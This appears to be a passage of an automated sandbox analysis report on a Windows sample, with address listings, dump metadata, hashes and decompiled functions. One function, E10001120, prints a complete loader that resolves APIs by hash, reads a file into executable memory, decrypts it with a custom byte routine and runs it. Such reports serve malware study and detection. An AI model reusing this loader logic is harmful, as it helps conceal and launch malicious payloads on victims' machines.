                                          0x00406977
                                          0x0040697a
                                          0x0040697d
                                          0x00406980
                                          0x00406982
                                          0x00406982
                                          0x00406982
                                          0x00406985
                                          0x00406988
                                          0x0040698a
                                          0x0040698b
                                          0x0040698e
                                          0x00000000
                                          0x0040698e
                                          0x00000000
                                          0x00406bc4
                                          0x00406bc8
                                          0x00406be6
                                          0x00406be9
                                          0x00406bf0
                                          0x00406bf3
                                          0x00406bf6
                                          0x00406bf9
                                          0x00406bfc
                                          0x00406bff
                                          0x00406c01
                                          0x00406c08
                                          0x00406c09
                                          0x00406c0b
                                          0x00406c0e
                                          0x00406c11
                                          0x00406c14
                                          0x00406c14
                                          0x00406c19
                                          0x00000000
                                          0x00406c19
                                          0x00406bca
                                          0x00406bcd
                                          0x00406bd0
                                          0x00406bda
                                          0x00406f91
                                          0x00406f91
                                          0x00000000
                                          0x00406f91
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00406c71
                                          0x00406c75
                                          0x00000000
                                          0x00000000
                                          0x00406c7b
                                          0x00406c7f
                                          0x00000000
                                          0x00000000
                                          0x00406c85
                                          0x00406c87
                                          0x00406c8b
                                          0x00406c8b
                                          0x00406c8e
                                          0x00406c92
                                          0x00000000
                                          0x00000000
                                          0x00406ce2
                                          0x00406ce6
                                          0x00406ced
                                          0x00406cf0
                                          0x00406cf3
                                          0x00406cfd
                                          0x00406f91
                                          0x00406f91
                                          0x00000000
                                          0x00406f91
                                          0x00406f91
                                          0x00406ce8
                                          0x00000000
                                          0x00000000
                                          0x00406d09
                                          0x00406d0d
                                          0x00406d14
                                          0x00406d17
                                          0x00406d1a
                                          0x00406d0f
                                          0x00406d0f
                                          0x00406d0f
                                          0x00406d1d
                                          0x00406d20
                                          0x00406d23
                                          0x00406d23
                                          0x00406d26
                                          0x00406d29
                                          0x00406d2c
                                          0x00406d2c
                                          0x00406d2f
                                          0x00406d36
                                          0x00406d3b
                                          0x00000000
                                          0x00000000
                                          0x00406dc9
                                          0x00406dc9
                                          0x00406dcd
                                          0x0040716b
                                          0x00000000
                                          0x0040716b
                                          0x00406dd3
                                          0x00406dd6
                                          0x00406dd9
                                          0x00406ddd
                                          0x00406de0
                                          0x00406de6
                                          0x00406de8
                                          0x00406de8
                                          0x00406de8
                                          0x00406deb
                                          0x00406dee
                                          0x00000000
                                          0x00000000
                                          0x004069be
                                          0x004069be
                                          0x004069c2
                                          0x0040712f
                                          0x00000000
                                          0x0040712f
                                          0x004069c8
                                          0x004069cb
                                          0x004069ce
                                          0x004069d2
                                          0x004069d5
                                          0x004069db
                                          0x004069dd
                                          0x004069dd
                                          0x004069dd
                                          0x004069e0
                                          0x004069e3
                                          0x004069e3
                                          0x004069e6
                                          0x004069e9
                                          0x00000000
                                          0x00000000
                                          0x004069ef
                                          0x004069f5
                                          0x00000000
                                          0x00000000
                                          0x004069fb
                                          0x004069fb
                                          0x004069ff
                                          0x00406a02
                                          0x00406a05
                                          0x00406a08
                                          0x00406a0b
                                          0x00406a0c
                                          0x00406a0f
                                          0x00406a11
                                          0x00406a17
                                          0x00406a1a
                                          0x00406a1d
                                          0x00406a20
                                          0x00406a23
                                          0x00406a26
                                          0x00406a29
                                          0x00406a45
                                          0x00406a48
                                          0x00406a4b
                                          0x00406a4e
                                          0x00406a55
                                          0x00406a59
                                          0x00406a5b
                                          0x00406a5f
                                          0x00406a2b
                                          0x00406a2b
                                          0x00406a2f
                                          0x00406a37
                                          0x00406a3c
                                          0x00406a3e
                                          0x00406a40
                                          0x00406a40
                                          0x00406a62
                                          0x00406a69
                                          0x00406a6c
                                          0x00000000
                                          0x00406a72
                                          0x00000000
                                          0x00406a72
                                          0x00000000
                                          0x00406a77
                                          0x00406a77
                                          0x00406a7b
                                          0x0040713b
                                          0x00000000
                                          0x0040713b
                                          0x00406a81
                                          0x00406a84
                                          0x00406a87
                                          0x00406a8b
                                          0x00406a8e
                                          0x00406a94
                                          0x00406a96
                                          0x00406a96
                                          0x00406a96
                                          0x00406a99
                                          0x00406a9c
                                          0x00406a9c
                                          0x00406a9c
                                          0x00406aa2
                                          0x00000000
                                          0x00000000
                                          0x00406aa4
                                          0x00406aa7
                                          0x00406aaa
                                          0x00406aad
                                          0x00406ab0
                                          0x00406ab3
                                          0x00406ab6
                                          0x00406ab9
                                          0x00406abc
                                          0x00406abf
                                          0x00406ac2
                                          0x00406ada
                                          0x00406add
                                          0x00406ae0
                                          0x00406ae3
                                          0x00406ae3
                                          0x00406ae6
                                          0x00406aea
                                          0x00406aec
                                          0x00406ac4
                                          0x00406ac4
                                          0x00406acc
                                          0x00406ad1
                                          0x00406ad3
                                          0x00406ad5
                                          0x00406ad5
                                          0x00406aef
                                          0x00406af6
                                          0x00406af9
                                          0x00000000
                                          0x00406afb
                                          0x00000000
                                          0x00406afb
                                          0x00406af9
                                          0x00406b00
                                          0x00406b00
                                          0x00406b00
                                          0x00406b00
                                          0x00000000
                                          0x00000000
                                          0x00406b3b
                                          0x00406b3b
                                          0x00406b3f
                                          0x00407147
                                          0x00000000
                                          0x00407147
                                          0x00406b45
                                          0x00406b48
                                          0x00406b4b
                                          0x00406b4f
                                          0x00406b52
                                          0x00406b58
                                          0x00406b5a
                                          0x00406b5a
                                          0x00406b5a
                                          0x00406b5d
                                          0x00406b60
                                          0x00406b60
                                          0x00406b66
                                          0x00406b04
                                          0x00406b04
                                          0x00406b07
                                          0x00000000
                                          0x00406b07
                                          0x00406b68
                                          0x00406b68
                                          0x00406b6b
                                          0x00406b6e
                                          0x00406b71
                                          0x00406b74
                                          0x00406b77
                                          0x00406b7a
                                          0x00406b7d
                                          0x00406b80
                                          0x00406b83
                                          0x00406b86
                                          0x00406b9e
                                          0x00406ba1
                                          0x00406ba4
                                          0x00406ba7
                                          0x00406ba7
                                          0x00406baa
                                          0x00406bae
                                          0x00406bb0
                                          0x00406b88
                                          0x00406b88
                                          0x00406b90
                                          0x00406b95
                                          0x00406b97
                                          0x00406b99
                                          0x00406b99
                                          0x00406bb3
                                          0x00406bba
                                          0x00406bbd
                                          0x00000000
                                          0x00406bbf
                                          0x00000000
                                          0x00406bbf
                                          0x00000000
                                          0x00406e4c
                                          0x00406e4c
                                          0x00406e50
                                          0x00407177
                                          0x00000000
                                          0x00407177
                                          0x00406e56
                                          0x00406e59
                                          0x00406e5c
                                          0x00406e60
                                          0x00406e63
                                          0x00406e69
                                          0x00406e6b
                                          0x00406e6b
                                          0x00406e6b
                                          0x00406e6e
                                          0x00000000
                                          0x00000000
                                          0x00406c1c
                                          0x00406c1c
                                          0x00406c1f
                                          0x00406f91
                                          0x00406f91
                                          0x00000000
                                          0x00406f91
                                          0x00000000
                                          0x00406f5b
                                          0x00406f5f
                                          0x00406f81
                                          0x00406f84
                                          0x00406f8e
                                          0x00406f91
                                          0x00406f91
                                          0x00000000
                                          0x00406f91
                                          0x00406f91
                                          0x00406f61
                                          0x00406f64
                                          0x00406f68
                                          0x00406f6b
                                          0x00406f6b
                                          0x00406f6e
                                          0x00000000
                                          0x00000000
                                          0x00407018
                                          0x0040701c
                                          0x0040703a
                                          0x0040703a
                                          0x0040703a
                                          0x00407041
                                          0x00407048
                                          0x0040704f
                                          0x0040704f
                                          0x00000000
                                          0x0040704f
                                          0x0040701e
                                          0x00407021
                                          0x00407024
                                          0x00407027
                                          0x0040702e
                                          0x00406f72
                                          0x00406f72
                                          0x00406f75
                                          0x00000000
                                          0x00000000
                                          0x00407109
                                          0x0040710c
                                          0x0040700d
                                          0x00000000
                                          0x00000000
                                          0x00406d43
                                          0x00406d45
                                          0x00406d4c
                                          0x00406d4d
                                          0x00406d4f
                                          0x00406d52
                                          0x00000000
                                          0x00000000
                                          0x00406d5a
                                          0x00406d5d
                                          0x00406d60
                                          0x00406d62
                                          0x00406d64
                                          0x00406d64
                                          0x00406d65
                                          0x00406d68
                                          0x00406d6f
                                          0x00406d72
                                          0x00406d80
                                          0x00000000
                                          0x00000000
                                          0x00407056
                                          0x00407056
                                          0x00407059
                                          0x00407060
                                          0x00000000
                                          0x00000000
                                          0x00407065
                                          0x00407065
                                          0x00407069
                                          0x004071a1
                                          0x00000000
                                          0x004071a1
                                          0x0040706f
                                          0x00407072
                                          0x00407075
                                          0x00407079
                                          0x0040707c
                                          0x00407082
                                          0x00407084
                                          0x00407084
                                          0x00407084
                                          0x00407087
                                          0x0040708a
                                          0x0040708a
                                          0x0040708a
                                          0x0040708a
                                          0x0040708d
                                          0x0040708d
                                          0x00407091
                                          0x004070f1
                                          0x004070f4
                                          0x004070f9
                                          0x004070fa
                                          0x004070fc
                                          0x004070fe
                                          0x00407101
                                          0x0040700d
                                          0x0040700d
                                          0x00000000
                                          0x00407013
                                          0x0040700d
                                          0x00407093
                                          0x00407099
                                          0x0040709c
                                          0x0040709f
                                          0x004070a2
                                          0x004070a5
                                          0x004070a8
                                          0x004070ab
                                          0x004070ae
                                          0x004070b1
                                          0x004070b4
                                          0x004070cd
                                          0x004070d0
                                          0x004070d3
                                          0x004070d6
                                          0x004070da
                                          0x004070dc
                                          0x004070dc
                                          0x004070dd
                                          0x004070e0
                                          0x004070b6
                                          0x004070b6
                                          0x004070be
                                          0x004070c3
                                          0x004070c5
                                          0x004070c8
                                          0x004070c8
                                          0x004070e3
                                          0x004070ea
                                          0x00000000
                                          0x004070ec
                                          0x00000000
                                          0x004070ec
                                          0x00000000
                                          0x00406d88
                                          0x00406d8b
                                          0x00406dc1
                                          0x00406ef1
                                          0x00406ef1
                                          0x00406ef1
                                          0x00406ef1
                                          0x00406ef4
                                          0x00406ef4
                                          0x00406ef7
                                          0x00406ef9
                                          0x00407183
                                          0x00000000
                                          0x00407183
                                          0x00406eff
                                          0x00406f02
                                          0x00000000
                                          0x00000000
                                          0x00406f08
                                          0x00406f0c
                                          0x00406f0f
                                          0x00406f0f
                                          0x00406f0f
                                          0x00000000
                                          0x00406f0f
                                          0x00406d8d
                                          0x00406d8f
                                          0x00406d91
                                          0x00406d93
                                          0x00406d96
                                          0x00406d97
                                          0x00406d99
                                          0x00406d9b
                                          0x00406d9e
                                          0x00406da1
                                          0x00406db7
                                          0x00406dbc
                                          0x00406df4
                                          0x00406df4
                                          0x00406df8
                                          0x00406e24
                                          0x00406e26
                                          0x00406e2d
                                          0x00406e30
                                          0x00406e33
                                          0x00406e33
                                          0x00406e38
                                          0x00406e38
                                          0x00406e3a
                                          0x00406e3d
                                          0x00406e44
                                          0x00406e47
                                          0x00406e74
                                          0x00406e74
                                          0x00406e77
                                          0x00406e7a
                                          0x00406eee
                                          0x00406eee
                                          0x00406eee
                                          0x00000000
                                          0x00406eee
                                          0x00406e7c
                                          0x00406e82
                                          0x00406e85
                                          0x00406e88
                                          0x00406e8b
                                          0x00406e8e
                                          0x00406e91
                                          0x00406e94
                                          0x00406e97
                                          0x00406e9a
                                          0x00406e9d
                                          0x00406eb6
                                          0x00406eb8
                                          0x00406ebb
                                          0x00406ebc
                                          0x00406ebf
                                          0x00406ec1
                                          0x00406ec4
                                          0x00406ec6
                                          0x00406ec8
                                          0x00406ecb
                                          0x00406ecd
                                          0x00406ed0
                                          0x00406ed4
                                          0x00406ed6
                                          0x00406ed6
                                          0x00406ed7
                                          0x00406eda
                                          0x00406edd
                                          0x00406e9f
                                          0x00406e9f
                                          0x00406ea7
                                          0x00406eac
                                          0x00406eae
                                          0x00406eb1
                                          0x00406eb1
                                          0x00406ee0
                                          0x00406ee7
                                          0x00406e71
                                          0x00406e71
                                          0x00406e71
                                          0x00406e71
                                          0x00000000
                                          0x00406ee9
                                          0x00000000
                                          0x00406ee9
                                          0x00406ee7
                                          0x00406dfa
                                          0x00406dfd
                                          0x00406dff
                                          0x00406e02
                                          0x00406e05
                                          0x00406e08
                                          0x00406e0a
                                          0x00406e0d
                                          0x00406e10
                                          0x00406e10
                                          0x00406e13
                                          0x00406e13
                                          0x00406e16
                                          0x00406e1d
                                          0x00406df1
                                          0x00406df1
                                          0x00406df1
                                          0x00406df1
                                          0x00000000
                                          0x00406e1f
                                          0x00000000
                                          0x00406e1f
                                          0x00406e1d
                                          0x00406da3
                                          0x00406da6
                                          0x00406da8
                                          0x00406dab
                                          0x00000000
                                          0x00000000
                                          0x00406b0a
                                          0x00406b0a
                                          0x00406b0e
                                          0x00407153
                                          0x00000000
                                          0x00407153
                                          0x00406b14
                                          0x00406b17
                                          0x00406b1a
                                          0x00406b1d
                                          0x00406b20
                                          0x00406b23
                                          0x00406b26
                                          0x00406b28
                                          0x00406b2b
                                          0x00406b2e
                                          0x00406b31
                                          0x00406b33
                                          0x00406b33
                                          0x00406b33
                                          0x00000000
                                          0x00000000
                                          0x00406c95
                                          0x00406c95
                                          0x00406c99
                                          0x0040715f
                                          0x00000000
                                          0x0040715f
                                          0x00406c9f
                                          0x00406ca2
                                          0x00406ca5
                                          0x00406ca8
                                          0x00406caa
                                          0x00406caa
                                          0x00406caa
                                          0x00406cad
                                          0x00406cb0
                                          0x00406cb3
                                          0x00406cb6
                                          0x00406cb9
                                          0x00406cbc
                                          0x00406cbd
                                          0x00406cbf
                                          0x00406cbf
                                          0x00406cbf
                                          0x00406cc2
                                          0x00406cc5
                                          0x00406cc8
                                          0x00406ccb
                                          0x00406ccb
                                          0x00406ccb
                                          0x00406cce
                                          0x00406cd0
                                          0x00406cd0
                                          0x00000000
                                          0x00000000
                                          0x00406f12
                                          0x00406f12
                                          0x00406f12
                                          0x00406f16
                                          0x00000000
                                          0x00000000
                                          0x00406f1c
                                          0x00406f1f
                                          0x00406f22
                                          0x00406f25
                                          0x00406f27
                                          0x00406f27
                                          0x00406f27
                                          0x00406f2a
                                          0x00406f2d
                                          0x00406f30
                                          0x00406f33
                                          0x00406f36
                                          0x00406f39
                                          0x00406f3a
                                          0x00406f3c
                                          0x00406f3c
                                          0x00406f3c
                                          0x00406f3f
                                          0x00406f42
                                          0x00406f45
                                          0x00406f48
                                          0x00406f4b
                                          0x00406f4f
                                          0x00406f51
                                          0x00406f54
                                          0x00000000
                                          0x00406f56
                                          0x00406cd3
                                          0x00406cd3
                                          0x00000000
                                          0x00406cd3
                                          0x00406f54
                                          0x00407189
                                          0x00000000
                                          0x00000000
                                          0x004067b8
                                          0x004071c0
                                          0x004071c0
                                          0x00000000
                                          0x004071c0
                                          0x0040700d
                                          0x00406f94
                                          0x00406f91

                                          Memory Dump Source
                                          • Source File: 00000001.00000002.656113568.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000001.00000002.656098530.0000000000400000.00000002.00020000.sdmp Download File
                                          • Associated: 00000001.00000002.656133616.0000000000408000.00000002.00020000.sdmp Download File
                                          • Associated: 00000001.00000002.656142531.000000000040A000.00000004.00020000.sdmp Download File
                                          • Associated: 00000001.00000002.656152726.0000000000413000.00000004.00020000.sdmp Download File
                                          • Associated: 00000001.00000002.656167614.0000000000422000.00000004.00020000.sdmp Download File
                                          • Associated: 00000001.00000002.656175020.000000000042A000.00000004.00020000.sdmp Download File
                                          • Associated: 00000001.00000002.656182728.000000000042D000.00000002.00020000.sdmp Download File
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: e1b0e058f0407479a5b4db29d08bd0827f70999cda66fb763b614c0a8a1c0f1e
                                          • Instruction ID: 903876060ddd0b56a19be001448e640a61514b7b9d13fdc5f9f4a1faaeb2382a
                                          • Opcode Fuzzy Hash: e1b0e058f0407479a5b4db29d08bd0827f70999cda66fb763b614c0a8a1c0f1e
                                          • Instruction Fuzzy Hash: AA714431D04229CBDF28CF98C844BADBBB1FF44305F15806AD856BB281C778AA96DF45
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 10001120, Relevance: 4.7, APIs: 3, Instructions: 152filememoryCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 62%
                                          			E10001120(void* __eflags) {
				signed int _v8;
				short _v528;
				signed int _v529;
				signed int _v536;
				intOrPtr _v540;
				void* _v544;
				long _v548;
				void* _v552;
				long _v556;
				intOrPtr _v560;
				intOrPtr _v564;
				intOrPtr _v568;
				intOrPtr _v572;
				intOrPtr _v576;
				intOrPtr _v580;
				signed int _t155;

				_v8 =  *0x10003028 ^ _t155;
				_v536 = 0;
				_v556 = 0;
				_v540 = E10001000();
				_v568 = E10001070(_v540, 0x8a111d91);
				_v560 = E10001070(_v540, 0xcbec1a0);
				_v564 = E10001070(_v540, 0xa4f84a9a);
				_v572 = E10001070(_v540, 0x170c1ca1);
				_v580 = E10001070(_v540, 0x433a3842);
				_v576 = E10001070(_v540, 0xa5f15738);
				_v560(0x103,  &_v528);
				_v564( &_v528, 0x10003000);
				_v552 = CreateFileW( &_v528, 0x80000000, 7, 0, 3, 0x80, 0);
				_v548 = _v572(_v552, 0);
				_v544 = VirtualAlloc(0, _v548, 0x3000, 0x40);
				ReadFile(_v552, _v544, _v548,  &_v556, 0);
				_v536 = 0;
				while(_v536 < _v556) {
					_v529 =  *((intOrPtr*)(_v544 + _v536));
					_v529 = (_v529 & 0x000000ff) - 0x26;
					_v529 = _v529 & 0x000000ff ^ _v536;
					_v529 = (_v529 & 0x000000ff) - 0xe9;
					_v529 = (_v529 & 0x000000ff) >> 0x00000002 | (_v529 & 0x000000ff) << 0x00000006;
					_v529 =  !(_v529 & 0x000000ff);
					_v529 = (_v529 & 0x000000ff) >> 0x00000005 | (_v529 & 0x000000ff) << 0x00000003;
					_v529 = (_v529 & 0x000000ff) + 1;
					_v529 =  !(_v529 & 0x000000ff);
					_v529 = _v529 & 0x000000ff ^ _v536;
					_v529 = (_v529 & 0x000000ff) + 0x62;
					_v529 = _v529 & 0x000000ff ^ _v536;
					_v529 =  !(_v529 & 0x000000ff);
					_v529 = (_v529 & 0x000000ff) + _v536;
					 *((char*)(_v544 + _v536)) = _v529;
					_v536 = _v536 + 1;
				}
				_v544();
				return E10001537(_v8 ^ _t155);
			}



















                                          0x10001130
                                          0x10001133
                                          0x1000113d
                                          0x1000114c
                                          0x10001166
                                          0x10001180
                                          0x1000119a
                                          0x100011b4
                                          0x100011ce
                                          0x100011e8
                                          0x100011fa
                                          0x1000120c
                                          0x10001231
                                          0x10001246
                                          0x10001262
                                          0x10001286
                                          0x1000128c
                                          0x100012a7
                                          0x100012c7
                                          0x100012d7
                                          0x100012ea
                                          0x100012fc
                                          0x10001318
                                          0x10001327
                                          0x10001343
                                          0x10001353
                                          0x10001362
                                          0x10001375
                                          0x10001385
                                          0x10001398
                                          0x100013a7
                                          0x100013ba
                                          0x100013d2
                                          0x100012a1
                                          0x100012a1
                                          0x100013d9
                                          0x100013ec

                                          APIs
                                          • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 1000122B
                                          • VirtualAlloc.KERNELBASE(00000000,?,00003000,00000040), ref: 1000125C
                                          • ReadFile.KERNELBASE(?,?,?,00000000,00000000), ref: 10001286
                                          Memory Dump Source
                                          • Source File: 00000001.00000002.657761961.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                          • Associated: 00000001.00000002.657756132.0000000010000000.00000002.00020000.sdmp Download File
                                          • Associated: 00000001.00000002.657768924.0000000010002000.00000002.00020000.sdmp Download File
                                          Similarity
                                          • API ID: File$AllocCreateReadVirtual
                                          • String ID:
                                          • API String ID: 3585551309-0
                                          • Opcode ID: 7a7d7021250b0f952916faf70c4e3161f02e42eb5f1c0ff8687e0a2b1c2e7606
                                          • Instruction ID: 872fe76af292f4eda75b157be3e9b4ac50ddc2008aeaeb5528de2e5c26c5d82f
                                          • Opcode Fuzzy Hash: 7a7d7021250b0f952916faf70c4e3161f02e42eb5f1c0ff8687e0a2b1c2e7606
                                          • Instruction Fuzzy Hash: 5D716274C462BC9ADB21CBA49C9DBECBFB09F5A201F0481C9E59D66286C6345FC4CF61
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0040329A, Relevance: 4.6, APIs: 3, Instructions: 101COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 94%
                                          			E0040329A(intOrPtr _a4) {
				intOrPtr _t10;
				intOrPtr _t11;
				signed int _t12;
				void* _t14;
				void* _t15;
				long _t16;
				void* _t18;
				intOrPtr _t19;
				intOrPtr _t31;
				long _t32;
				intOrPtr _t34;
				intOrPtr _t36;
				void* _t37;
				intOrPtr _t49;

				_t32 =  *0x41f8fc; // 0x31839
				_t34 = _t32 -  *0x40b868 + _a4;
				 *0x424750 = GetTickCount() + 0x1f4;
				if(_t34 <= 0) {
					L22:
					E00402E52(1);
					return 0;
				}
				E00403419( *0x41f90c);
				SetFilePointer( *0x40a01c,  *0x40b868, 0, 0); // executed
				 *0x41f908 = _t34;
				 *0x41f8f8 = 0;
				while(1) {
					_t10 =  *0x41f900; // 0x39667
					_t31 = 0x4000;
					_t11 = _t10 -  *0x41f90c;
					if(_t11 <= 0x4000) {
						_t31 = _t11;
					}
					_t12 = E00403403(0x4138f8, _t31);
					if(_t12 == 0) {
						break;
					}
					 *0x41f90c =  *0x41f90c + _t31;
					 *0x40b888 = 0x4138f8;
					 *0x40b88c = _t31;
					L6:
					L6:
					if( *0x424754 != 0 &&  *0x424800 == 0) {
						_t19 =  *0x41f908; // 0x173c
						 *0x41f8f8 = _t19 -  *0x41f8fc - _a4 +  *0x40b868;
						E00402E52(0);
					}
					 *0x40b890 = 0x40b8f8;
					 *0x40b894 = 0x8000; // executed
					_t14 = E00406776(0x40b870); // executed
					if(_t14 < 0) {
						goto L20;
					}
					_t36 =  *0x40b890; // 0x40d034
					_t37 = _t36 - 0x40b8f8;
					if(_t37 == 0) {
						__eflags =  *0x40b88c; // 0x0
						if(__eflags != 0) {
							goto L20;
						}
						__eflags = _t31;
						if(_t31 == 0) {
							goto L20;
						}
						L16:
						_t16 =  *0x41f8fc; // 0x31839
						if(_t16 -  *0x40b868 + _a4 > 0) {
							continue;
						}
						SetFilePointer( *0x40a01c, _t16, 0, 0); // executed
						goto L22;
					}
					_t18 = E00405E68( *0x40a01c, 0x40b8f8, _t37); // executed
					if(_t18 == 0) {
						_push(0xfffffffe);
						L21:
						_pop(_t15);
						return _t15;
					}
					 *0x40b868 =  *0x40b868 + _t37;
					_t49 =  *0x40b88c; // 0x0
					if(_t49 != 0) {
						goto L6;
					}
					goto L16;
					L20:
					_push(0xfffffffd);
					goto L21;
				}
				return _t12 | 0xffffffff;
			}

















                                          0x0040329d
                                          0x004032aa
                                          0x004032bd
                                          0x004032c2
                                          0x004033f2
                                          0x004033f4
                                          0x00000000
                                          0x004033fa
                                          0x004032ce
                                          0x004032e1
                                          0x004032e7
                                          0x004032ed
                                          0x004032f8
                                          0x004032f8
                                          0x004032fd
                                          0x00403302
                                          0x0040330a
                                          0x0040330c
                                          0x0040330c
                                          0x00403315
                                          0x0040331c
                                          0x00000000
                                          0x00000000
                                          0x00403322
                                          0x00403328
                                          0x0040332e
                                          0x00000000
                                          0x00403334
                                          0x0040333a
                                          0x00403344
                                          0x0040335a
                                          0x0040335f
                                          0x00403364
                                          0x0040336a
                                          0x00403370
                                          0x0040337a
                                          0x00403381
                                          0x00000000
                                          0x00000000
                                          0x00403383
                                          0x00403389
                                          0x0040338b
                                          0x004033ae
                                          0x004033b4
                                          0x00000000
                                          0x00000000
                                          0x004033b6
                                          0x004033b8
                                          0x00000000
                                          0x00000000
                                          0x004033ba
                                          0x004033ba
                                          0x004033cd
                                          0x00000000
                                          0x00000000
                                          0x004033dc
                                          0x00000000
                                          0x004033dc
                                          0x00403395
                                          0x0040339c
                                          0x004033e9
                                          0x004033ef
                                          0x004033ef
                                          0x00000000
                                          0x004033ef
                                          0x0040339e
                                          0x004033a4
                                          0x004033aa
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x004033ed
                                          0x004033ed
                                          0x00000000
                                          0x004033ed
                                          0x00000000

                                          APIs
                                          • GetTickCount.KERNEL32 ref: 004032AE
                                            • Part of subcall function 00403419: SetFilePointer.KERNELBASE(00000000,00000000,00000000,00403117,?), ref: 00403427
                                          • SetFilePointer.KERNELBASE(00000000,00000000,?,00000000,004031C4,00000004,00000000,00000000,?,?,0040313E,000000FF,00000000,00000000,0040A130,?), ref: 004032E1
                                          • SetFilePointer.KERNELBASE(00031839,00000000,00000000,004138F8,00004000,?,00000000,004031C4,00000004,00000000,00000000,?,?,0040313E,000000FF,00000000), ref: 004033DC
                                          Memory Dump Source
                                          • Source File: 00000001.00000002.656113568.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000001.00000002.656098530.0000000000400000.00000002.00020000.sdmp Download File
                                          • Associated: 00000001.00000002.656133616.0000000000408000.00000002.00020000.sdmp Download File
                                          • Associated: 00000001.00000002.656142531.000000000040A000.00000004.00020000.sdmp Download File
                                          • Associated: 00000001.00000002.656152726.0000000000413000.00000004.00020000.sdmp Download File
                                          • Associated: 00000001.00000002.656167614.0000000000422000.00000004.00020000.sdmp Download File
                                          • Associated: 00000001.00000002.656175020.000000000042A000.00000004.00020000.sdmp Download File
                                          • Associated: 00000001.00000002.656182728.000000000042D000.00000002.00020000.sdmp Download File
                                          Similarity
                                          • API ID: FilePointer$CountTick
                                          • String ID:
                                          • API String ID: 1092082344-0
                                          • Opcode ID: 10914339fb078c172392a439e9ed0b3db4c7f76b37a754b5eca90989c3c04b63
                                          • Instruction ID: 9f56c4e15643f9c800c1675ca7a95df02ba07fd451ae32c2dc2afdd0933238d4
                                          • Opcode Fuzzy Hash: 10914339fb078c172392a439e9ed0b3db4c7f76b37a754b5eca90989c3c04b63
                                          • Instruction Fuzzy Hash: E6317A72500216DFD710BF2AEE8496A3BACE740356324C13BE914B22F0CB3899469B9D
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00403192, Relevance: 3.1, APIs: 2, Instructions: 88COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 92%
                                          			E00403192(void* __ecx, long _a4, intOrPtr _a8, void* _a12, long _a16) {
				long _v8;
				long _t21;
				long _t22;
				void* _t24;
				long _t26;
				int _t27;
				long _t28;
				void* _t30;
				long _t31;
				long _t32;
				long _t36;

				_t21 = _a4;
				if(_t21 >= 0) {
					_t32 = _t21 +  *0x4247b8;
					 *0x41f8fc = _t32;
					SetFilePointer( *0x40a01c, _t32, 0, 0); // executed
				}
				_t22 = E0040329A(4);
				if(_t22 >= 0) {
					_t24 = E00405E39( *0x40a01c,  &_a4, 4); // executed
					if(_t24 == 0) {
						L18:
						_push(0xfffffffd);
						goto L19;
					} else {
						 *0x41f8fc =  *0x41f8fc + 4;
						_t36 = E0040329A(_a4);
						if(_t36 < 0) {
							L21:
							_t22 = _t36;
						} else {
							if(_a12 != 0) {
								_t26 = _a4;
								if(_t26 >= _a16) {
									_t26 = _a16;
								}
								_t27 = ReadFile( *0x40a01c, _a12, _t26,  &_v8, 0); // executed
								if(_t27 != 0) {
									_t36 = _v8;
									 *0x41f8fc =  *0x41f8fc + _t36;
									goto L21;
								} else {
									goto L18;
								}
							} else {
								if(_a4 <= 0) {
									goto L21;
								} else {
									while(1) {
										_t28 = _a4;
										if(_a4 >= 0x4000) {
											_t28 = 0x4000;
										}
										_v8 = _t28;
										if(E00405E39( *0x40a01c, 0x4138f8, _t28) == 0) {
											goto L18;
										}
										_t30 = E00405E68(_a8, 0x4138f8, _v8); // executed
										if(_t30 == 0) {
											_push(0xfffffffe);
											L19:
											_pop(_t22);
										} else {
											_t31 = _v8;
											_a4 = _a4 - _t31;
											 *0x41f8fc =  *0x41f8fc + _t31;
											_t36 = _t36 + _t31;
											if(_a4 > 0) {
												continue;
											} else {
												goto L21;
											}
										}
										goto L22;
									}
									goto L18;
								}
							}
						}
					}
				}
				L22:
				return _t22;
			}














                                          0x00403196
                                          0x0040319f
                                          0x004031a8
                                          0x004031ac
                                          0x004031b7
                                          0x004031b7
                                          0x004031bf
                                          0x004031c6
                                          0x004031d8
                                          0x004031df
                                          0x00403284
                                          0x00403284
                                          0x00000000
                                          0x004031e5
                                          0x004031e8
                                          0x004031f4
                                          0x004031f8
                                          0x00403292
                                          0x00403292
                                          0x004031fe
                                          0x00403201
                                          0x00403260
                                          0x00403266
                                          0x00403268
                                          0x00403268
                                          0x0040327a
                                          0x00403282
                                          0x00403289
                                          0x0040328c
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00403203
                                          0x00403206
                                          0x00000000
                                          0x0040320c
                                          0x00403211
                                          0x00403218
                                          0x0040321b
                                          0x0040321d
                                          0x0040321d
                                          0x0040322a
                                          0x00403234
                                          0x00000000
                                          0x00000000
                                          0x0040323d
                                          0x00403244
                                          0x0040325c
                                          0x00403286
                                          0x00403286
                                          0x00403246
                                          0x00403246
                                          0x00403249
                                          0x0040324c
                                          0x00403252
                                          0x00403258
                                          0x00000000
                                          0x0040325a
                                          0x00000000
                                          0x0040325a
                                          0x00403258
                                          0x00000000
                                          0x00403244
                                          0x00000000
                                          0x00403211
                                          0x00403206
                                          0x00403201
                                          0x004031f8
                                          0x004031df
                                          0x00403294
                                          0x00403297

                                          APIs
                                          • SetFilePointer.KERNELBASE(0040A130,00000000,00000000,00000000,00000000,?,?,0040313E,000000FF,00000000,00000000,0040A130,?), ref: 004031B7
                                          Memory Dump Source
                                          • Source File: 00000001.00000002.656113568.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000001.00000002.656098530.0000000000400000.00000002.00020000.sdmp Download File
                                          • Associated: 00000001.00000002.656133616.0000000000408000.00000002.00020000.sdmp Download File
                                          • Associated: 00000001.00000002.656142531.000000000040A000.00000004.00020000.sdmp Download File
                                          • Associated: 00000001.00000002.656152726.0000000000413000.00000004.00020000.sdmp Download File
